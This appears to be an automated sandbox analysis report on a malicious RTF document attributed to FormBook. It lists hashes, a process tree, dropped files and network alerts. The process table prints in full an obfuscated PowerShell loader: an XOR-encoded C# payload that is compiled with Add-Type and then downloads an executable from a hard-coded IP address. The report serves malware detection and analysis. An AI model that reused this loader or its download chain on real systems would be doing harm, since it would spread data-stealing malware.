File name: | 75a6e1467602c664b2e16b1eb53efef1 |
Full analysis: | https://app.any.run/tasks/813e6cee-5b08-4308-ac20-bf16ae516e47 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer distributed as Malware-as-a-Service (MaaS). It differs from much competing malware in its extreme ease of use, which allows even inexperienced threat actors to operate it. In this run the observed chain is: Word (PID 3632) opens the RTF; Excel is started with -Embedding (parent svchost.exe); PowerShell is launched under wmiprvse.exe, XOR-decodes an embedded C# source string and compiles it with Add-Type/csc.exe; PowerShell (PID 3464) then requests http://35.225.200.121/DD/10101304, which the Suricata alerts flag as an MZ (PE) response from a dotted-quad host. The FormBook attribution rests on the verdict above; the downloaded payload itself is not listed in the file table of this report. |
Analysis date: | July 17, 2019, 14:06:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 75A6E1467602C664B2E16B1EB53EFEF1 |
SHA1: | 66D4FF7BF1E88159D07C52DD46F164A9DA7D50B4 |
SHA256: | DF840C277459622556E8C9E06F3CCA25307A2E01ABC07436D2B11C71D3719A0A |
SSDEEP: | 1536:oZdMRFtGeCbMW+j1EysqdrnEppBS1DMO8tpsXrlaTB3HH8fKRFtGeCbMW+j1Eysw:oHMjlaxnjlaxnjlax4txS |
.rtf | | | Rich Text Format (100) |
---|---|---|---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3632 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\75a6e1467602c664b2e16b1eb53efef1.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1216 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3464 | powershell -WindowStyle Hidden function d7e7618 { param($rf31ce) $yfe5659 = 'na3ea1';$wd92e = ''; for ($i = 0; $i -lt $rf31ce.length; $i+=2) { $vc7e9c = [convert]::ToByte($rf31ce.Substring($i, 2), 16); $wd92e += [char]($vc7e9c -bxor $yfe5659[($i / 2) % $yfe5659.length]); } return $wd92e; } $e282c84 = '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'; $e282c842 = d7e7618($e282c84); Add-Type -TypeDefinition $e282c842; [y662e2]::te43c3(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2408 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2992 | powershell -WindowStyle Hidden function d7e7618 { param($rf31ce) $yfe5659 = 'na3ea1';$wd92e = ''; for ($i = 0; $i -lt $rf31ce.length; $i+=2) { $vc7e9c = [convert]::ToByte($rf31ce.Substring($i, 2), 16); $wd92e += [char]($vc7e9c -bxor $yfe5659[($i / 2) % $yfe5659.length]); } return $wd92e; } $e282c84 = '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'; $e282c842 = d7e7618($e282c84); Add-Type -TypeDefinition $e282c842; [y662e2]::te43c3(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3624 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
356 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\2qefgdow.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
4060 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE83E.tmp" "c:\Users\admin\AppData\Local\Temp\CSCE82D.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2268 | powershell -WindowStyle Hidden function d7e7618 { param($rf31ce) $yfe5659 = 'na3ea1';$wd92e = ''; for ($i = 0; $i -lt $rf31ce.length; $i+=2) { $vc7e9c = [convert]::ToByte($rf31ce.Substring($i, 2), 16); $wd92e += [char]($vc7e9c -bxor $yfe5659[($i / 2) % $yfe5659.length]); } return $wd92e; } $e282c84 = '1b125a0b06113d184011045c5514400c0f564e324a161554034f61100f45070c564b285f1a04410a11620b13450c02541d5a4616085f0941601c12450b0c1d210850090f5c1615580d12081012580006133618421a045e4b287e5514400c0f564e324a161554034f7d00150a636b4310035d070213060d501d12131c57075c04011e3a75020d7a08115e1c151b470a541c0f560952034c4d760b154317315c0c0f455343740015611c0e502405551c044016431833414310035d0702131615501a08504504491a04410b41780015631113111e0456520319270f473515434e115551505256041f161543070f5445020059025051480a35255f09285c1e0e411149130504410b045d5d53114941740015411c315e070f47455c114c2d5c04057d0703410413484c486e4511440c0d5a0641421a00470c02110b194700135f4e285d1131451c41525256575f49401113580006131300065952044c5a6a2a0d5f2c0c410113474d435a0b135d000d025c431f45245f1a134a350e5800150e4737581c1546040d611c0e470002454c486e4511440c0d5a0641421a00470c02110b194700135f4e035c0a0d111b58020104070d497a0b15611a1313035604565807064d64270f473515434e17510455084241460c0f454e110a04070342415c1015111b085d114153590006015718553a77090d7803115c1715194c2a56170f540252014b055d02431f45245f1a134a350e5800150e473345022c5c13047c0b0c5c17181342416000157d0f124720134301130e03005d1d041a3841421a00470c02110b194700135f4e175c0c05110b00015d025246285d1131451c414a0150085c571f2c0f453e1541450e075b040a504d580015131d02040c520606480a1e14510908524e12470415580d415a0b15111a04075602024648482c0f453e1541450b045d535107410c4e00045207004605040056075f591b4751575e02075551525a07065051035e05114c480a07071b0f54025c0351585c7800156311131f3404410a484a090e470a4142560450035503551c7a0b15611a13130e05555b5257035c410b040407495b5b520107031d0a56565257005649115707010d55035502025c54015507010856025451015954045503005d431a4c5a580849580105045d0555585c7800156311131f3404410a48
4a090e470a4142560450035503551c662c0f453e15414509065f0305584964270f4735154347540810085f1a41465200050d5c035e08574640465c50550b57504d0a550a540001071d06560207571d5e1907554d5e1b15131056505a021a4c1a5601155c4512090b025551530a13234a11046a33414a5355545a5c485519025f4d031d075742514b5c514c55285d1131451c41455656535d560e2800431d0952094f70020d5c062976020e51040d195d48082800431d0952094f7201114a4d18075a040749511d18520407520642521a5e04505c595006495f0b16132c0f453e15414d0a550a540001071f3a0e7a0b15075a491a4e51495e510207481d18520407520642521a5e12090b025551530b4e365607225d07045d11415e5756575c540c0004444536540c225f0c045f1a491a5e12451c085d0241455a0450515c7400175a170e5f03045d114f760b15750a0d550b136304155946245d130843010f5e000f454032430002580f0d750a0d550b131d241141020850041558010f77041550474a11393d405c02045d431a0a56565257005649115151015a5551555113475a5c5c565557541d210e46000d5c040577070d564d05060b56055459194c51055454055950065003000b55025053015855515052015d54515107015f54065050000854555052015c55525754065b55025051015d54075050015e545750500159431a4915050b02074c5a611c0e500012423d155217157800075c451208585652580f54194163170e520b12403615501c157a0b075e461507000205475a63170e520b12404b32450f13474d12085856524c5a430b1546170f115e5a4e1514530208504512450f155a0641421a135a0b06110a565652570056494011135800061309525558071a1e12451c085d02414108550206595453435d0452540f50115e12451c085d024150595655545c621a135a0b061f2b0c4311180a080e414d085f1a415a58510a075d5f560507084f7f000f561a09080c4a0c5c48480718450b41430004060c5c700a0f470b13474b355e2c184700495d5d0505034f621b034011135800061b0c4d03474d0253480a0f560403501a5349500d00434749430004060c416d4511575a50505d046a46081c5748114b41430355000d59564b2d540006470d3c18551c410015441c0f13045606085008181c'; $e282c842 = d7e7618($e282c84); Add-Type -TypeDefinition $e282c842; [y662e2]::te43c3(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2084 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\hdf5riec.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD050.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1216 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRDD02.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2408 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE30D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3464 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AXIPILW1LGWVGEDGMVUI.temp | — | |
MD5:— | SHA256:— | |||
3624 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE6F5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZREUU1ABEFD47QCB8ZGC.temp | — | |
MD5:— | SHA256:— | |||
356 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCE82D.tmp | — | |
MD5:— | SHA256:— | |||
356 | csc.exe | C:\Users\admin\AppData\Local\Temp\2qefgdow.pdb | — | |
MD5:— | SHA256:— | |||
4060 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESE83E.tmp | — | |
MD5:— | SHA256:— | |||
356 | csc.exe | C:\Users\admin\AppData\Local\Temp\2qefgdow.dll | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3464 | powershell.exe | GET | — | 35.225.200.121:80 | http://35.225.200.121/DD/10101304 | US | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3464 | powershell.exe | 35.225.200.121:80 | — | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.novocan.life | — | unknown |
PID | Process | Class | Message |
---|---|---|---|
3464 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3464 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3464 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|